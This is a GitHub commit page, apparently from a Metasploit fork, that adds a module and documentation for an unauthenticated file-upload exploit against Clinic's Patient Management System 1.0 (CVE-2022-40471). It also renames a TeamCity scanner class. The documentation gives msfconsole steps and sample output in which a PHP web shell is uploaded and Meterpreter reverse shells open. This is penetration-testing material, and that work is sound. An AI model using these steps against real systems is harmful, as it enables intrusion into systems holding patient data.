Skip to content

Commit

Permalink
Merge remote-tracking branch 'upstream/master'
Browse files Browse the repository at this point in the history
  • Loading branch information
certcc-ghbot committed Dec 18, 2024
2 parents 4a5d81d + 37eaa29 commit 7fb4c3e
Show file tree
Hide file tree
Showing 7 changed files with 432 additions and 5 deletions.
64 changes: 63 additions & 1 deletion db/modules_metadata_base.json
Original file line number Diff line number Diff line change
Expand Up @@ -58136,7 +58136,7 @@
"https"
],
"targets": null,
"mod_time": "2024-11-04 16:58:32 +0000",
"mod_time": "2024-12-17 14:27:41 +0000",
"path": "/modules/auxiliary/scanner/teamcity/teamcity_login.rb",
"is_install_path": true,
"ref_name": "scanner/teamcity/teamcity_login",
Expand Down Expand Up @@ -102724,6 +102724,68 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_multi/http/clinic_pms_fileupload_rce": {
"name": "Clinic's Patient Management System 1.0 - Unauthenticated RCE",
"fullname": "exploit/multi/http/clinic_pms_fileupload_rce",
"aliases": [

],
"rank": 600,
"disclosure_date": "2022-10-31",
"type": "exploit",
"author": [
"Aaryan Golatkar",
"Oğulcan Hami Gül"
],
"description": "This module exploits an unauthenticated file upload vulnerability in Clinic's\n Patient Management System 1.0. An attacker can upload a PHP web shell and execute\n it by leveraging directory listing enabled on the `/pms/user_images` directory.",
"references": [
"EDB-51779",
"CVE-2022-40471",
"URL-https://www.cve.org/CVERecord?id=CVE-2022-40471",
"URL-https://drive.google.com/file/d/1m-wTfOL5gY3huaSEM3YPSf98qIrkl-TW/view"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Clinic Patient Management System 1.0"
],
"mod_time": "2024-12-17 21:39:30 +0000",
"path": "/modules/exploits/multi/http/clinic_pms_fileupload_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/clinic_pms_fileupload_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": true
},
"exploit_multi/http/clipbucket_fileupload_exec": {
"name": "ClipBucket beats_uploader Unauthenticated Arbitrary File Upload",
"fullname": "exploit/multi/http/clipbucket_fileupload_exec",
Expand Down
116 changes: 116 additions & 0 deletions documentation/modules/exploit/multi/http/clinic_pms_fileupload_rce.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,116 @@
## Vulnerable Application
The Clinic's Patient Management System (CPMS) 1.0 is vulnerable to Unauthenticated Remote Code Execution (RCE) due to a file upload vulnerability.
This exploit allows an attacker to upload arbitrary files, such as a PHP web shell, which can then be executed remotely.
The exploitation occurs because of a misconfiguration in the server, specifically a lack of file validation for uploads and the presence of
a directory listing feature in `/pms/user_images`.
This enables an attacker to upload a PHP file and access it via a publicly accessible URL, executing arbitrary PHP code.

## Verification Steps

### Vulnerable Application Installation Setup
1. Install Clinic's Patient Management System 1.0 on your web server.
- Download the Web Application from [here](https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code)
- For **Windows**
- [ ] Open your XAMPP Control Panel and start Apache and MySQL.
- [ ] Extract the downloaded source code zip file.
- [ ] Copy the extracted source code folder and paste it into the XAMPP's "htdocs" directory.
- [ ] Browse the PHPMyAdmin in a browser. i.e. http://localhost/phpmyadmin
- [ ] Create a new database naming `pms_db`.
- [ ] Import the provided SQL file. The file is known as pms_db.sql located inside the database folder.
- [ ] Browse the Clinic Patient Management System in a browser. i.e. http://localhost/pms/

- For **Linux**
- [ ] Start Apache2 & MySQL with the command `sudo systemctl start apache2 && sudo systemctl start mysql`
- [ ] Install PHPMyAdmin with the command `sudo apt install phpmyadmin -y`
- [ ] Edit `/etc/apache2/apache2.conf` by appending this line: `Include /etc/phpmyadmin/apache.conf`
- [ ] Extract the downloaded source code zip file into "/var/www/html" directory
- [ ] Next steps are similar to the ones for Windows, so follow that

2. Start `msfconsole` and load the exploit module:
```bash
msfconsole
use exploit/multi/http/clinic_pms_fileupload_rce
```

3. Set the required options:
```bash
set rport <port>
set rhost <ip>
set targeturi /pms
```

4. Check if the target is vulnerable:
```bash
check
```

If the target is vulnerable, you will see a message indicating that the target is susceptible to the exploit:
```
[+] <IP> The target is vulnerable.
```

5. Set up the listener for the exploit:
```bash
set lport <port>
set lhost <ip>
```

6. Launch the exploit:
```bash
exploit
```

7. If successful, you will receive a PHP Meterpreter shell.

## Options
- `TARGETURI`: (Required) The base path to the Clinic Patient Management System (default: `/pms`).
- `LISTING_DELAY`: (Optional) The time to wait before fetching the directory listing after uploading the shell (default: `2` seconds).


## Scenarios

### Clinic's Patient Management System on a Linux Target
```bash
msf exploit(multi/http/clinic_pms_fileupload_rce) > check
[*] Checking if target is vulnerable...
[+] 127.0.0.1:80 - The target is vulnerable.

msf exploit(multi/http/clinic_pms_fileupload_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.104:4444
[*] Detected OS: linux
[*] Target is Linux/Unix. Using PHP Meterpreter payload with unlink_self.
[*] Uploading PHP Meterpreter payload as zuX7FDRe.php...
[+] Payload uploaded successfully!
[*] Executing the uploaded shell at /pms/user_images/1734340436zuX7FDRe.php...
[*] Sending stage (40004 bytes) to 192.168.1.104
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.104:48290) at 2024-12-16 14:43:59 +0530

meterpreter > sysinfo
Computer : kali
OS : Linux kali 6.11.2-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.11.2-1kali1 (2024-10-15) x86_64
Meterpreter : php/linux
meterpreter >
```
### Clinic's Patient Management System on a Windows Target
```bash
msf exploit(multi/http/clinic_pms_fileupload_rce) > check
[*] Checking if target is vulnerable...
[+] 192.168.1.103:80 - The target is vulnerable.

msf exploit(multi/http/clinic_pms_fileupload_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.104:4444
[*] Detected OS: winnt
[*] Target is Windows. Using standard PHP Meterpreter payload.
[*] Uploading PHP Meterpreter payload as lgTprVq5.php...
[+] Payload uploaded successfully!
[*] Executing the uploaded shell at /pms/user_images/1734341267lgTprVq5.php...
[*] Sending stage (40004 bytes) to 192.168.1.103
[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.103:60615) at 2024-12-16 14:57:43 +0530

meterpreter > sysinfo
Computer : DESKTOP-VE9J36K
OS : Windows NT DESKTOP-VE9J36K 10.0 build 19045 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter >
```
2 changes: 1 addition & 1 deletion lib/metasploit/framework/login_scanner/teamcity.rb
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@ module LoginScanner
# This is the LoginScanner class for dealing with JetBrains TeamCity instances.
# It is responsible for taking a single target, and a list of credentials
# and attempting them. It then saves the results.
class Teamcity < HTTP
class TeamCity < HTTP

module Crypto
# https://github.com/openssl/openssl/blob/a08a145d4a7e663dd1e973f06a56e983a5e916f7/crypto/rsa/rsa_pk1.c#L125
Expand Down
3 changes: 2 additions & 1 deletion lib/msf_autoload.rb
Original file line number Diff line number Diff line change
Expand Up @@ -297,7 +297,8 @@ def custom_inflections
'appapi' => 'AppApi',
'uds_errors' => 'UDSErrors',
'smb_hash_capture' => 'SMBHashCapture',
'rex_ntlm' => 'RexNTLM'
'rex_ntlm' => 'RexNTLM',
'teamcity' => 'TeamCity'
}
end

Expand Down
2 changes: 1 addition & 1 deletion modules/auxiliary/scanner/teamcity/teamcity_login.rb
Original file line number Diff line number Diff line change
Expand Up @@ -93,7 +93,7 @@ def run_host(ip)
ssl: datastore['SSL']
)

scanner = Metasploit::Framework::LoginScanner::Teamcity.new(scanner_opts)
scanner = Metasploit::Framework::LoginScanner::TeamCity.new(scanner_opts)
run_scanner(scanner)
end
end
Loading

0 comments on commit 7fb4c3e

Please sign in to comment.